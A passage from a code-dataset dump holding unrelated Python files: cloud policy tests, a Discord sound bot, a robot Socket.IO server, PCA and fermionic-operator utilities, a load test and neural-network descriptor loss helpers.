@context(module_path=\"basic\")\n def test_basic(self, ctx: GcpEnvironmentContext):\n policy = next((policy for policy in ctx.binary_authorization_policies if policy.project_id == 'dev-for-tests'), None)\n self.assertIsNotNone(policy)\n self.assertFalse(policy.global_policy_evaluation_mode_enabled)\n self.assertEqual(policy.default_admission_rule,\n GcpBinaryAuthorizationAdmissionRule(GcpBinaryAuthorizationAdmissionRuleType.DEFAULT,\n GcpBinaryAuthorizationAdmissionEvaluationMode.ALWAYS_DENY,\n GcpBinaryAuthorizationAdmissionEnforcementMode.ENFORCED_BLOCK_AND_AUDIT_LOG,\n None))\n self.assertTrue(len(policy.cluster_admission_rules), 1)\n self.assertEqual(policy.cluster_admission_rules[0],\n GcpBinaryAuthorizationAdmissionRule(GcpBinaryAuthorizationAdmissionRuleType.CLUSTER,\n GcpBinaryAuthorizationAdmissionEvaluationMode.REQUIRE_ATTESTATION,\n GcpBinaryAuthorizationAdmissionEnforcementMode.ENFORCED_BLOCK_AND_AUDIT_LOG,\n 'us-west1-a.gke-cluster-007'))\n container_cluster = next((cluster for cluster in ctx.container_clusters if cluster.name == 'gke-cluster-007'), None)\n self.assertIsNotNone(container_cluster)\n self.assertTrue(len(container_cluster.binary_auth_policies), 2)\n self.assertTrue(any(policy.enforcement_mode == GcpBinaryAuthorizationAdmissionEnforcementMode.ENFORCED_BLOCK_AND_AUDIT_LOG\n for policy in container_cluster.binary_auth_policies))\n","sub_path":"tests/knowledge/context/gcp/test_binary_authorization_policy.py","file_name":"test_binary_authorization_policy.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"143120152","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport argparse\n\ndef convert_to_query_text(datadir, outdir):\n files = [(\"main-valid-results\", \"val\"), (\"main-test-results\", \"test\")]\n for f_tuple in files:\n f = f_tuple[0]\n fname = f_tuple[1]\n in_fpath = os.path.join(datadir, f + \".txt\")\n out_fpath = os.path.join(outdir, fname + \".txt\")\n notfound = 0\n total = 0\n outfile = open(out_fpath, 'w')\n print(\"processing dataset: {}\".format(fname))\n with open(in_fpath, 'r') as f:\n for i, line in enumerate(f):\n total += 1\n if i % 1000000 == 0:\n print(\"line: {}\".format(i))\n\n items = line.strip().split(\" %%%% \")\n if len(items) != 3:\n print(\"ERROR: line - {}\".format(line))\n sys.exit(1)\n\n lineid = items[0].strip()\n tokens = items[1].strip().split()\n tags = items[2].strip().split()\n\n query_tokens = []\n for token, tag in zip(tokens, tags):\n if tag == \"I\":\n query_tokens.append(token)\n\n query_text = \" \".join(query_tokens)\n\n line_to_print = \"{} %%%% {}\".format(lineid, query_text)\n # print(line_to_print)\n outfile.write(line_to_print + \"\\n\")\n\n print(\"done with dataset: {}\".format(fname))\n print(\"notfound: {}\".format(notfound))\n print(\"found: {}\".format(total-notfound))\n print(\"-\" * 60)\n outfile.close()\n print(\"DONE!\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Get the gold query text after entity detection')\n parser.add_argument('-d', '--dataset', dest='dataset', action='store', required = True,\n help='path to the results directory after entity detection')\n parser.add_argument('-o', '--output', dest='output', action='store', required=True,\n help='output directory for the query text')\n\n args = parser.parse_args()\n print(\"Dataset: {}\".format(args.dataset))\n print(\"Output: {}\".format(args.output))\n\n if not os.path.exists(args.output):\n os.makedirs(args.output)\n\n convert_to_query_text(args.dataset, args.output)\n print(\"Converted the results after entity detection to query text.\")\n","sub_path":"ferhan_simple_qa_rnn/entity_detection/results_to_query.py","file_name":"results_to_query.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"644265964","text":"import asyncio\nfrom aiohttp import web\nimport socketio\nimport hexdump\nfrom log import logname\nfrom firmware import Shield\nfrom system import System\nfrom version import version_info\n\nlogger = logname(\"sockets\")\n\nclass WSnamespace(socketio.AsyncNamespace):\n def __init__(self, namespace='/sockets'):\n super().__init__(namespace)\n self.sio = None\n self.shield = Shield()\n self.system = System()\n\n async def on_connect(self, sid, environ):\n logger.info(\"connected %s\", sid)\n await self.sio.emit('connected', {\n 'tcs_ver' : version_info,\n 'firmware_ver' : self.shield.getFirmwareVersion(),\n 'wifi_dongle' : self.system.getWirelessAdapterInfo(),\n 'video_devices': self.system.getCameraInfo()\n }, namespace=\"/sockets\")\n\n\n async def on_motors(self, sid, payload):\n self.shield.setMotors(payload)\n await self.sio.emit('response', \"motors set\", namespace=\"/sockets\")\n\n async def on_manipulator(self, sid, payload):\n self.shield.setManipulator(payload)\n await self.sio.emit('response', 'manipulator set', namespace=\"/sockets\")\n\n async def on_gripper(self, sid, payload):\n self.shield.setGripper(payload)\n await self.sio.emit('response', 'gripper set', namespace=\"/sockets\")\n\n async def on_telemetry(self, sid):\n await self.sio.emit('telemetry', {\n 'temperature': self.system.getTemperature(),\n 'battery': self.shield.getBattery(),\n 'signal': self.system.getSignal()\n }, namespace=\"/sockets\")\n\n async def on_clupi(self, sid, payload):\n self.shield.setClupi(payload['angle'], payload['transl'])\n await self.sio.emit('response', 'clupi set', namespace=\"/sockets\")\n\n\n async def on_shutdown(self, sid):\n self.system.shutdown() \n \n async def on_reboot(self, sid):\n self.system.reboot()\n\n async def set_flip_state(self, direction):\n await self.sio.emit('response', {\"type\": \"preventFlip\", \"value\": direction }, namespace=\"/sockets\")\n\n\nclass WSserver():\n def __init__(self, app):\n super().__init__()\n self.sio = None\n self.namespace = WSnamespace('/sockets')\n self.app = app\n \n def start(self):\n self.sio = socketio.AsyncServer(async_mode='aiohttp')\n self.sio.register_namespace(self.namespace)\n self.namespace.sio = self.sio\n self.sio.attach(self.app)\n\n","sub_path":"server/sockets.py","file_name":"sockets.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"157864594","text":"import asyncio\nimport discord\nimport os, time\nfrom discord.ext import commands\n\nfrom gtts import gTTS\n\nimport logger as log\nlogger = log.getLogger(__name__)\n\nclass Sounds(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n self.voice = None\n self.alphabet = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','V','W','Y','Z']\n\n logger.info(\"Sound constructor finished\")\n\n if os.path.isdir(\"/tmp\"):\n logger.info(\"tmp folder does not exists, creating...\")\n os.mkdir('tmp')\n\n def cog_unload(self):\n pass\n\n def cog_check(self, ctx: commands.Context):\n if not ctx.guild:\n raise commands.NoPrivateMessage('This command can\\'t be used in DM channels.')\n\n return True\n \n async def cog_command_error(self, ctx: commands.Context, error: commands.CommandError):\n await ctx.send(ctx.author.mention+\" Sound Error look at this: \"+ str(error))\n\n async def _removeFile(self, path):\n \"\"\"Removes file from given path\"\"\"\n\n logger.info(\"Removing file: \"+path)\n os.remove(path)\n\n async def _playInChannel(self, channel, path, removeFile=False):\n \"\"\"Plays from file from given path to given channel\"\"\"\n\n logger.info(\"Playing sound in channel: ChannelId: \"+str(channel.id)+\" ChannelName: \"+str(channel.name)+\" Path: \"+str(path)) \n\n self.voice = await channel.connect()\n await asyncio.sleep(0.5) \n self.voice.play(discord.FFmpegPCMAudio(path), after = self.voice.stop())\n while(self.voice.is_playing()):\n await asyncio.sleep(1)\n await self.voice.disconnect()\n\n if removeFile:\n await self._removeFile(path)\n\n async def _play(self, ctx: commands.Context, soundType=None, targetFolder=None, targetChannel=None, removeFile=False):\n \"\"\"Abstract sound command to play in given context\"\"\"\n\n logger.info(\"Playing sound in context: GuildId: \"+str(ctx.guild.id)+\" ChannelId: \"+str(ctx.channel.id)+\" AuthorId: \"+str(ctx.author.id))\n\n path = targetFolder+soundType+'.mp3'\n if not os.path.isfile(path):\n await ctx.send(\"File search failed. File: \"+soundType)\n return\n\n if len(self.bot.voice_clients) == 0:\n member = ctx.message.author\n for channel in member.guild.channels:\n if channel.type == discord.ChannelType.voice:\n if channel.name == targetChannel:\n await ctx.send(\"Playing now: \"+soundType)\n await self._playInChannel(channel, path, removeFile=removeFile)\n return \n if targetChannel == None:\n for m in channel.voice_states:\n if m == member.id:\n await ctx.send(\"Playing now: \"+soundType)\n await self._playInChannel(channel, path, removeFile=removeFile)\n return\n await ctx.send(\"No channel found to play: \"+soundType)\n else:\n await ctx.send(\"Impossible to play: \"+soundType)\n\n @commands.command(name='sound')\n async def _sound(self,ctx: commands.Context,soundType):\n \"\"\"Arrives to you and plays your favourite sound\"\"\"\n\n await self._play(ctx, soundType, \"./audio/\")\n\n @commands.command(name='soundchannel')\n @commands.has_permissions(manage_guild=True)\n async def _soundchannel(self, ctx: commands.Context,soundType, *args):\n \"\"\"Arrives to you and plays your favourite sound in given channel\"\"\"\n\n channel = None\n if len(args) > 0:\n channel = ' '.join(args)\n\n logger.info(\"Playing sound: \"+soundType+ \" in channel: \"+str(channel))\n\n await self._play(ctx, soundType, \"./audio/\", targetChannel=channel)\n\n @commands.command(name=\"soundtts\")\n async def _soundtts(self, ctx: commands.Context, *args):\n \"\"\"Arrives to you and plays given message\"\"\"\n\n logger.info(\"Joining channel and speaking message: \"+str(args))\n\n tmpName = str(int(time.time()*1000.0))\n text = ''\n\n if len(args) == 0:\n await ctx.send(\"No message given\")\n return\n \n text = ' '.join(args)\n tts = gTTS(text=text, lang='pl')\n tts.save('tmp/'+tmpName+'.mp3')\n\n await self._play(ctx, soundType=tmpName, targetFolder=\"./tmp/\", removeFile=True)\n\n @commands.command(name='soundlist')\n async def _soundList(self, ctx: commands.Context):\n \"\"\"Prints the list of all avaible sounds\"\"\"\n\n logger.info(\"List of sounds\")\n\n embed = discord.Embed(title=\"Sounds list\",description=\"All of the sounds\",color=0x076500)\n\n sounds = os.listdir('./audio')\n\n for char in self.alphabet:\n s = ''\n for sound in sounds:\n if sound[:1].upper() == char:\n s += sound[:-4] + '\\n'\n if s != '':\n embed.add_field(name=char, value=s)\n\n await ctx.send(embed=embed)\n\n @commands.command(name='soundupload')\n @commands.has_permissions(manage_guild=True)\n async def _uploadSound(self, ctx: commands.Context):\n \"\"\"Attach a sound to be uploaded with this command\"\"\"\n \n logger.info(\"Uploading sound\")\n\n if len(ctx.message.attachments) == 1:\n file = ctx.message.attachments[0].filename\n path = \"audio/{}\".format(file)\n if file.endswith(\".mp3\") and not os.path.isfile(path):\n await ctx.message.attachments[0].save(fp=path)\n logger.info(\"Uploaded sound: {}\".format(file))\n\n @commands.command(name='soundrm')\n @commands.has_permissions(manage_guild=True)\n async def _removeSound(self, ctx: commands.Context, sound):\n \"\"\"Removes a given sound\"\"\"\n \n logger.info(\"Removing sound: \"+sound)\n\n try:\n path = './audio/'+sound+'.mp3' \n os.remove(path) \n await ctx.send('Removed: '+sound)\n except Exception:\n raise\n\nasync def setup(bot):\n \"\"\"Add component\"\"\"\n\n logger.info(\"Adding cog \" + __name__)\n await bot.add_cog(Sounds(bot))\n","sub_path":"sounds.py","file_name":"sounds.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"230793939","text":"import sys\nimport numpy as np\n\ndef main():\n\n #First arg is dataFile and second arg is labelsfile\n\n if len(sys.argv) != 3:\n print(sys.argv[0], \"takes 2 arguments. Not \", len(sys.argv) - 1)\n sys.exit()\n\n first = sys.argv[1]\n second = sys.argv[2]\n print(sys.argv[0], \"args are:\", first, second)\n\n # Read numpy array from a file\n\n # The file f1.txt has two rows. First row is 1 2 seond row is 3 4\n Y = np.genfromtxt(second) # default delimiter is space\n print(\"Y=\", Y)\n\n # The file f2.txt : First row is 1, 2 seond row is 3, 4\n Xt = np.genfromtxt(first, delimiter=',', autostrip=True) # trip spaces\n print(\"X=\", Xt)\n n,m=Xt.shape\n\n # calculate mu = mean xi\n mu = np.mean(Xt, axis=0)\n mu=mu.reshape(m,1)\n\n #Input ends and PCA algorithm starts\n R=np.dot((Xt.T)-mu,((Xt.T)-mu).T)\n print(\"R=\",R)\n\n #Now since R by it's property is symmetric but still to avoid any complication assume non-symmetric\n #Computing eigen values and eigen vectors of R\n evals, evecs = np.linalg.eig(R)\n print(\"evals=\", evals, \" evecs=\", evecs)\n\n #The Eigen values and eigen vectors are not necessarily be sorted bcz eig() is used nd not eigh(), so sort them.\n idx = np.argsort(evals)[::-1]\n evals = evals[idx]\n evecs = evecs[:, idx]\n print(\"evals=\", evals, \" evecs=\", evecs) # evectors are the cols of evecs\n\n #now we need to extract the k=2 features out of the available features, here 4\n #Hence we need top 2 evectors(columns) corresponding to the top 2 max. evalues\n v1v2=evecs[:,[0,1]]\n print(\"v1v2=\",v1v2)\n\n #Computing the projections\n proj=np.dot((v1v2.T),(Xt.T))\n #Need to transpose the proj because it's dimensions are 2xn\n proj=proj.T # proj is now nx2 similar dimension as the input data\n print(\"Proj=\",proj)\n\n # Write array to a file\n np.savetxt(first+'_pca2_output', proj, delimiter=',')\n\n\nif __name__ == '__main__':\n main()","sub_path":"pca2.py","file_name":"pca2.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"262202793","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : huxiansheng (you@example.org)\n\nimport xlrd\n\n# 获取登录需要的账号密码\nclass login_data():\n\n def get_loginvalue(self):\n loginvalues = []\n loginvalue = xlrd.open_workbook(r'C:\\Users\\Administrator\\Desktop\\Skin01\\get_excel\\Excel_info\\loginvalue.xls')\n table = loginvalue.sheet_by_name(u'Sheet1') # 通过名称获取\n nrows = table.nrows # 获取行数\n if nrows > 1:\n for i in range(nrows - 1):\n x = table.row_values(i + 1)\n loginvalues.append(x)\n return loginvalues\n else:\n return None\n # loginvalues[username] = password\n\n\n# a = login_data().get_loginvalue()\n# print(a)","sub_path":"get_excel/login_data.py","file_name":"login_data.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"646970416","text":"\"\"\"\nFunctions used for fermionic multiplication. These are written for multiplication in the Nambu basis (c_i,UP^dag, c_i,DOWN), so be careful using them elsewhere!\n\"\"\"\n\n\n# BITWISE FUNCTIONS ##################################################\n\ndef bitCount(int_type):\n\t\"\"\"Returns the number of bits that are equal to 1 in the binary form of the integer int_type.\"\"\"\n\tcount = 0\n\twhile(int_type):\n\t\tint_type &= int_type - 1\n\n\t\tcount += 1\n\treturn(count)\n\ndef clearBit(int_type, offset):\n\t\"\"\"Sets the bit at offset to 0.\"\"\"\n\tmask = ~(1 << offset)\n\treturn(int_type & mask)\n\ndef flipBit(int_type, offset):\n\t\"\"\"Flips the bit at position offset in the integer int_type.\"\"\"\n\tmask = 1 << offset\n\treturn(int_type ^ mask)\n\ndef testBit(int_type, offset):\n mask = 1 << offset\n return(int_type & mask)\n\ndef countSetBits(n): \n\t\"\"\"Counts the number of bits that are set to 1 in a given integer.\"\"\"\n\tcount = 0\n\twhile (n): \n\t\tcount += n & 1\n\t\tn >>= 1\n\treturn count \n\n# FERMIONIC MULTIPLICATION ###########################################\n\ndef fmulti_cr(m, i, s, N):\n\t\"\"\"Multiplies the state |m> with c_i,s^dag. N is the number of energy levels, and is len(bin(m))//2. Spin: UP = 0, DOWN = 1.\n\tReturns [±1, integer], where ±1 specifies the sign prefactor, and bin(integer) is the resulting state. If the multiplication is not possible, returns None.\n\t\"\"\"\n\n\tnew_m = flipBit(m, 2*N - (2*i+1+s)) #flips 2*i-th bit in m\n\n\tif new_m > m: #the operator can act, the result is new_m, with a prefactor ±1\n\t\treturn prefactor_cr(m, i, s, N), new_m \n\n\tif new_m < m: #the operator destroys the state; return None (this must not be return 0, as |00...> is also a valid state!)\n\t\treturn 1, None\n\ndef prefactor_cr(m, i, s, N):\n\t\"\"\"Calculates the sign prefactor, obtained when multiplying the state |m> with c_i,s^dag. Spin: UP = 0, DOWN = 1.\n\tN is the number of energy levels, and is len(bin(m))//2. Takes bin(m), sets all its bit from positions 2N to ith to 0 and counts\n\thow remaining many bits are equal to 1.\"\"\"\n\n\tnew_num = m\n\t#set bits to zero\n\tfor j in range(0, 2*N - ((2*i)+1+s)):\n\t\tnew_num = clearBit(new_num, j) \n\t\n\t#count the remaining 1s\n\tcount = bitCount(new_num)\n\t\n\treturn (-1)**count\n\ndef fmulti_an(m, i, s, N):\n\t\"\"\"Multiplies the state |m> with c_i,s. N is the number of energy levels, and is len(bin(m))//2. Spin: UP = 0, DOWN = 1.\n\tReturns [±1, integer], where ±1 specifies the sign prefactor, and bin(integer) is the resulting state. If the multiplication is not possible, returns None.\n\t\"\"\"\n\n\tnew_m = flipBit(m, 2*N - ((2*i)+1+s)) #flips 2*i+1-th bit in m\n\n\tif new_m < m:\t#the operator can act, the result is new_m, with a prefactor ±1\n\t\treturn prefactor_an(m, i, s, N), new_m \n\n\n\tif new_m > m: #the operator destroys the state; return None (this must not be return 0, as |00...> is also a valid state!)\n\t\treturn 1, None\n\t\ndef prefactor_an(m, i, s, N):\n\t\"\"\"Calculates the sign prefactor, obtained when multiplying the state |m> with c_i,s. Spin: UP = 0, DOWN = 1.\n\tN is the number of energy levels, and is len(bin(m))//2. Takes bin(m), sets all its bit from positions 2N to ith to 0 \n\tand counts how remaining many bits are equal to 1.\"\"\"\n\n\tnew_num = m\n\t#set bits to zero\n\tfor j in range(0, 2*N - ((2*i)+s)):\n\t\tnew_num = clearBit(new_num, j) \n\t\n\t#count the remaining 1s\n\tcount = bitCount(new_num)\n\t\n\treturn (-1)**count\n\ndef number_op(state, i, s, N):\n\t\"\"\"Calculates the resut of a number operator acting on a given state (a linear superposition of |m>) at position i with spin s. Spin should be 0 for up and 1 for down.\"\"\"\n\tnew_state={}\n\n\tfor m in state:\n\t\tif s == 0:\n\t\t\tnew_m = flipBit(m, 2*N - (2*i+1)) #flips 2*i-th bit in m\n\t\telif s == 1:\n\t\t\tnew_m = flipBit(m, 2*N - ((2*i)+2)) #flips 2*i+1-th bit in m\n\n\t\tif new_m < m:\t#occupany in m is 1\n\t\t\tnew_state[m] = state[m]\n\n\treturn new_state\t\t\n\ndef cr(state, i, s, N):\n\t\"\"\"Application of c_i,s^dag on a given state (a linear superposition of |m>). Spin should be 0 for up and 1 for down.\"\"\"\n\tnew_state = {}\n\n\tfor basis_state in state:\n\t\tprefactor_cr, state_cr = fmulti_cr(basis_state, i, s, N)\n\n\t\tif state_cr != None:\n\n\t\t\ttry:\n\t\t\t\tnew_state[state_cr] += prefactor_cr * state[basis_state]\n\t\t\texcept KeyError:\n\t\t\t\tnew_state[state_cr] = prefactor_cr * state[basis_state]\n\n\treturn new_state\t\t\t\n\ndef an(state, i, s, N):\n\t\"\"\"Application of c_i,s on a given state (a linear superposition of |m>). Spin should be 0 for up and 1 for down.\"\"\"\n\tnew_state = {}\n\n\tfor basis_state in state:\n\t\tprefactor_an, state_an = fmulti_an(basis_state, i, s, N)\n\n\t\tif state_an != None:\n\n\t\t\ttry:\n\t\t\t\tnew_state[state_an] += prefactor_an * state[basis_state]\n\t\t\texcept KeyError:\n\t\t\t\tnew_state[state_an] = prefactor_an * state[basis_state]\n\n\treturn new_state\n\n# UTILITY ######################################################################\n# THESE FUNCTIONS ARE USED WHEN THE STATE IS REPRESENTED AS A DICTIONARY - THE KEY IS A STATE, ITS VALUE IS THE PROBABILITY AMPLITUDE.\n\ndef dict_sum(a, b):\n\t\"\"\"Calculates a sum of two states, represented by a dictionary.\"\"\"\n\tres = a\n\n\tfor key in b:\n\t\ttry:\n\t\t\tres[key] += b[key]\n\t\texcept KeyError:\n\t\t\tres[key] = b[key]\n\t\t\t\t\n\treturn res\n\ndef dict_list_sum(list_of_dicts):\n\t\"\"\"Sums a list of dictionaries.\"\"\"\n\tres = {}\n\tfor dictionary in list_of_dicts:\n\t\tres=dict_sum(res, dictionary)\n\n\treturn res\n\ndef dict_prod(num, dic):\n\t\"\"\"Multiply every value in the dictionary by a number. Used for multiplying numbers and states.\"\"\"\n\n\tfor i in dic:\n\t\tdic[i]*=num\n\n\treturn dic\n\ndef scalar_prod(dicta, dictb):\n\t\"\"\"Calculates a scalar product between two states, given as Python dictionaries.\"\"\"\n\tres=0\n\tfor a in dicta:\n\t\tfor b in dictb:\n\t\t\tif a==b:\n\t\t\t\tres+=dicta[a]*dictb[b]\n\n\treturn res\t\t\t\n\n\n","sub_path":"Mean field/Functions_fermionic_multiplication.py","file_name":"Functions_fermionic_multiplication.py","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"539003458","text":"from locust import HttpUser, SequentialTaskSet, task, events\n\nfrom common.reports import save_stats, save_stats_history, save_stats_failure, notify_start_test\n\n\nclass UserBehavior(SequentialTaskSet):\n\n @task(1)\n def homePage(self):\n with self.client.get(\"/site\", name = \"Home Page\", catch_response=True) as response:\n if response.status_code != 200:\n response.failure(\"Got wrong response code \" + str(response.status_code))\n return\n if response.content is None:\n response.failure(\"Response is empty\")\n return\n\nclass WebsiteUser(HttpUser):\n tasks = [UserBehavior]\n wait_time = between(5, 9)\n\n\n\nerrors = {}\n\n\n@events.request_failure.add_listener\ndef request_failure_handler(request_type, name, response_time, exception, **kwargs):\n key_name = name.strip().lower().replace(\" \", \"_\")\n\n if key_name not in errors:\n errors[key_name] = {}\n errors[key_name][\"count\"] = 0\n errors[key_name][\"type\"] = request_type\n errors[key_name][\"exception\"] = exception\n\n errors[key_name][\"count\"] += 1\n\n\n@events.test_stop.add_listener\ndef on_quitting(**kwargs):\n save_stats(scenery=\"site\")\n save_stats_history(scenery=\"site\")\n save_stats_failure(scenery=\"site\", errors=errors)\n notify_start_test(scenery=\"site\")","sub_path":"stresstest/locustfiles/tasks/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"502832088","text":"import Pmf\n\ndef Mode(hist):\n arr = AllModes(hist)\n return arr[0][0]\n\ndef AllModes(hist):\n arr = []\n for x in hist.Values():\n arr.append([x, hist.Freq(x)])\n arr = sorted(arr, key = lambda x: x[1], reverse = True)\n return arr\n","sub_path":"python/think_stats/Mode.py","file_name":"Mode.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"555522523","text":"import torch\nfrom torch.autograd import Variable\nfrom torch import nn\n\n\nclass DepthToSpace(nn.Module):\n\n def __init__(self, block_size):\n super().__init__()\n self.bs = block_size\n\n def forward(self, x):\n N, C, H, W = x.size()\n x = x.view(N, self.bs, self.bs, C // (self.bs ** 2),\n H, W) # (N, bs, bs, C//bs^2, H, W)\n # (N, C//bs^2, H, bs, W, bs)\n x = x.permute(0, 3, 4, 1, 5, 2).contiguous()\n x = x.view(N, C // (self.bs ** 2), H * self.bs, W *\n self.bs) # (N, C//bs^2, H * bs, W * bs)\n return x\n\n\nclass SpaceToDepth(nn.Module):\n\n def __init__(self, block_size):\n super().__init__()\n self.bs = block_size\n\n def forward(self, x):\n N, C, H, W = x.size()\n x = x.view(N, C, H // self.bs, self.bs, W // self.bs,\n self.bs) # (N, C, H//bs, bs, W//bs, bs)\n # (N, bs, bs, C, H//bs, W//bs)\n x = x.permute(0, 3, 5, 1, 2, 4).contiguous()\n x = x.view(N, C * (self.bs ** 2), H // self.bs, W //\n self.bs) # (N, C*bs^2, H//bs, W//bs)\n return x\n\n\ndef print_gpu_info():\n print(torch.cuda.get_device_name(0))\n print('Memory Usage:')\n print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3, 1), 'GB')\n print('Cached: ', round(torch.cuda.memory_cached(0)/1024**3, 1), 'GB')\n\n\ndef descriptor_loss(descriptors, warped_descriptors, homographies, valid_mask, new_mode, device):\n\n def flat2mat(H):\n \"\"\"\n Converts a flattened homography transformation with shape `[1, 8]` to its\n corresponding homography matrix with shape `[1, 3, 3]`.\n \"\"\"\n return torch.reshape(torch.cat([H, torch.ones([H.shape[0], 1], device=device)], dim=1), [-1, 3, 3])\n\n def mat2flat(H):\n \"\"\"\n Converts an homography matrix with shape `[1, 3, 3]` to its corresponding flattened\n homography transformation with shape `[1, 8]`.\n \"\"\"\n H = torch.reshape(H, [-1, 9])\n return (H / H[:, 8:9])[:, :8]\n\n def invert_homography(H):\n \"\"\"\n Computes the inverse transformation for a flattened homography transformation.\n \"\"\"\n return mat2flat(torch.inverse(flat2mat(H)))\n\n def warp_points(points, homography):\n \"\"\"\n Warp a list of points with the INVERSE of the given homography.\n The inverse is used to be coherent with tf.contrib.image.transform\n\n Arguments:\n points: list of N points, shape (N, 2).\n homography: batched or not (shapes (B, 8) and (8,) respectively).\n\n Returns: a Tensor of shape (N, 2) or (B, N, 2) (depending on whether the homography\n is batched) containing the new coordinates of the warped points.\n \"\"\"\n\n H = torch.unsqueeze(homography, dim=0) if len(\n homography.shape) == 1 else homography\n points = torch.cat((points[:, -1:], points[:, :-1]), dim=1)\n\n # Get the points to the homogeneous format\n num_points = points.shape[0]\n points = points.type(torch.float32)\n\n points = torch.cat(\n [points, torch.ones([num_points, 1], device=device)], -1)\n H_inv = (flat2mat(invert_homography(H)))\n\n warped_points = torch.matmul(H_inv, points.transpose(0, 1))\n\n warped_points = warped_points[:, :2, :] / warped_points[:, 2:, :]\n warped_points = torch.transpose(warped_points, 1, 2)\n warped_points = torch.cat(\n (warped_points[:, :, -1:], warped_points[:, :, :-1]), dim=2)\n return warped_points[0] if homography.shape[0] == 1 else warped_points\n\n (batch_size, C, Hc, Wc) = descriptors.shape\n\n descriptors = descriptors.permute(0, 2, 3, 1)\n warped_descriptors = warped_descriptors.permute(0, 2, 3, 1)\n\n coord_cells = torch.stack(torch.meshgrid(torch.arange(\n Hc, device=device), torch.arange(Wc, device=device)), dim=2).type(torch.float32)\n coord_cells = coord_cells * 8 + 8 // 2 # (Hc, Wc, 2)\n\n warped_coord_cells = warp_points(\n torch.reshape(coord_cells, [-1, 2]), homographies)\n warped_coord_cells = torch.reshape(\n warped_coord_cells, [batch_size, Hc, Wc, 1, 1, 2])\n\n descriptors = torch.reshape(descriptors, [batch_size, Hc, Wc, 1, 1, -1])\n warped_descriptors = torch.reshape(\n warped_descriptors, [batch_size, 1, 1, Hc, Wc, -1])\n dot_product_desc = torch.sum(descriptors * warped_descriptors, -1)\n\n coord_cells = (torch.reshape(\n coord_cells, [1, 1, 1, Hc, Wc, 2])).type(torch.float)\n cell_distances = torch.norm(coord_cells - warped_coord_cells, dim=-1)\n\n positive_dist = torch.clamp(1. - dot_product_desc, min=0)\n negative_dist = torch.clamp(dot_product_desc - 0.2, min=0)\n\n if not new_mode:\n s = (cell_distances <= 8 - 0.5).type(torch.float)\n\n # Compute the loss\n loss = 250 * s * positive_dist + (1 - s) * negative_dist\n # Mask the pixels if bordering artifacts appear\n valid_mask = SpaceToDepth(8)(valid_mask)\n valid_mask = torch.prod(valid_mask, dim=1) # AND along the channel dim\n valid_mask = torch.reshape(valid_mask, [batch_size, 1, 1, Hc, Wc])\n normalization = torch.sum(valid_mask) * Hc * Wc\n loss = torch.sum(valid_mask * loss) / normalization\n return loss\n\n else:\n s_plus = (cell_distances <= 7.5).type(torch.float)\n #s_minus = (cell_distances <= 50).type(torch.float) - s_plus\n s_minus = 1. - s_plus\n\n positive_loss = torch.sum(s_plus*positive_dist)/torch.sum(s_plus)\n negative_loss = torch.sum(s_minus*negative_dist)/torch.sum(s_minus) * 100.\n loss = positive_loss + negative_loss\n #print(torch.sum(s_plus*dot_product_desc)/torch.sum(s_plus))\n #print(torch.sum(s_minus*dot_product_desc)/torch.sum(s_minus))\n #print(positive_loss)\n #print(negative_loss)\n #print('---------------------------')\n\n return loss\n\n\ndef get_labels(kmap, device):\n N, C, H, W = kmap.shape\n padding = Variable(torch.ones(\n N, 1, H, W, dtype=torch.float32, device=device))\n kmap = torch.cat((kmap*2, padding), 1)\n labels = torch.argmax(kmap, dim=1)\n return labels\n","sub_path":"training_helper.py","file_name":"training_helper.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"472663786","text":"# import relevant libraries\n# system libraries\nimport time\nimport threading\n\n# loop counter\ncount = 0\n\n\ndef data_send():\n\tprint(\"DATA SEND\")\n\n\nwhile True:\n\t# sets up time variable needed to ensure loop happens once a second\n\t# rather than + 1 second\n\tstarttime = time.time()\n\t\n\t# prints counter to display progress of loop\n\tprint(\"\\nCount: \" + str(count))\n\t\n\t# receives status of signal from API, prints to terminal\n\tprint(\"DATA READ\")\n\t\n\tif count == 10:\n\t\t# creates a thread to allow the data send process to run in parallel\n\t\tdata_send_thread = threading.Thread(target = data_send)\n\t\t# starts the thread\n\t\tdata_send_thread.start()\n\t\t\n\t\t# resets count to start loop again\n\t\tcount = 0\n \n\t# increments loop\n\tcount += 1\n\t# sleeps process for the rest of the second\n\t# takes process time and removes it from the second, then sleeps for remaining time\n\ttime.sleep(1.0 - ((time.time() - starttime) % 60))\n","sub_path":"Submission-Code/Test-Functions/loop_b.py","file_name":"loop_b.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"355776650","text":"# Python 3 server example\r\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\r\nimport time\r\nimport urllib\r\nimport pickle\r\nfrom os import path\r\nimport os\r\n\r\n# import all user data class\r\nfrom data_wrangler import Data\r\n\r\nhostName = 